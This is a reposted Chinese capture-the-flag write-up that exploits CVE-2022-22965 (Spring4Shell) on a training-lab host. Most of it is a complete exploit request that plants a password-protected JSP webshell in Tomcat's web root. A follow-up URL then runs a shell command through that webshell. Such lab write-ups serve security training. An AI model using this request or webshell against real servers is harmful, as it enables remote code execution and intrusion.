欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 八卦 > CVE-2022-22965~框架漏洞【春秋云境靶场渗透】

CVE-2022-22965~框架漏洞【春秋云境靶场渗透】

2024/10/24 3:24:39 来源:https://blog.csdn.net/weixin_67832625/article/details/141067410  浏览:    关键词:CVE-2022-22965~框架漏洞【春秋云境靶场渗透】

在这里插入图片描述

image-20240809170829826

# 我们首先使用burp抓包

image-20240809171237116

# 然后我们发送给repeater并修改数据包
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: eci-2zebpda4xu6yjwuj6l5c.cloudeci1.ichunqiu.com:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1722404691,1722742103,1723191350,1723192309; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1723192309; HMACCOUNT=9CB767351C436DB4
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1//需要把host改成自己的,然后再进行操作

image-20240809171920685

# 然后访问上传的jsp,查看flag
http://eci-2zebpda4xu6yjwuj6l5c.cloudeci1.ichunqiu.com:8080/tomcatwar.jsp?pwd=j&cmd=cat%20/flag

image-20240809172118502

好小子,离成又近一步!!!

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com